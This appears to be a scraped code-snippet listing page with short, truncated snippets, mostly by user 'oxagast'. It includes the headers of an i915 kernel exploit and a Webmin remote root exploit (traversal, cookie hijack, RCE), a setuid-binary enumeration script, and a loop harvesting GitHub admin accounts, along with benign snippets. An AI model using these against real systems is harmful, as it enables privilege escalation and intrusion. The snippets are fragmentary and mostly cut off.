oxagast

/*                                                           */
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */
/*             exploit by oxagast                            */
/*                                                           */
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0 
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t

oxagast

#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ( $path !~ m/metasploit/ ) {
    print("err: Your current working directory must be metasploit's.\n");
    exit(1);
}
print("autopreter by oxagast\n");
if ( $#ARGV < 1 ) {

oxagast

echo AAAABCCCC | perl -e '$change = $ARGV[1]; $findme = $ARGV[0]; $let = <STDIN>; $hex = unpack("H*", $let); $reg = qr/$findme/; if ($hex =~ s/(.*)${reg}(.*)/\1$change\2/){$newhex = pack("H*", $hex);} print $newhex;' 414243 444546

oxagast

PKG=$(apt-cache search . | cut -f 1 -d ' ');
echo $PKG | xargs apt-get download;
DEB=(`find *.deb`);
for i in ${DEB[@]};
do dpkg -c $i | cut -c 4- | grep ^s | cut -f 2 -d '.' ; done | tee deb_suid_root.txt

oxagast

for i in {1..10000};
  do
    curl "https://api.github.com/users/KevinHock/following?per_page=100&page=${i}" -s | tee -a github.ids; # KevinHock follows everyone
    sleep 300; # sleep 5 min between pages or rate limit kicks in soon
 done;
cat github.ids | grep true -B 18 -A 1 | grep login | cut -d '"' -f 4 | xargs -I {LOGIN} curl "https://api.github.com/users
/{LOGIN}" -s | sed -e 's/}/},/' > github_admins.txt
cat github_admins.txt;

YaaSSDD

HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
  then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"

oxagast

# finds and sorts most commonly used processor instructions from raw objdump dissassembley.
objdump -D /bin/bash | grep -E "  .{6,}:" | grep -v '(bad)' | cut -d ':' -f 2 | sort -b -t, -nk2 | uniq -c | sort -n -r | grep -E "\s+[[:digit:]]+\s+.{12,}$" | head -n 15

oxagast

#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  )
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed

oxagast

/* touch qg.c && gcc qg.c -o gg.o -c && ld gg.o -o quine 2>/dev/null && ./quine | cat */

darkwave

/*
 For more information visit Android developer portal http://developer.android.com/training/sharing/receive.html
*/

import android.graphics.BitmapFactory;
import android.graphics.Bitmap;
import java.io.InputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import android.content.Intent;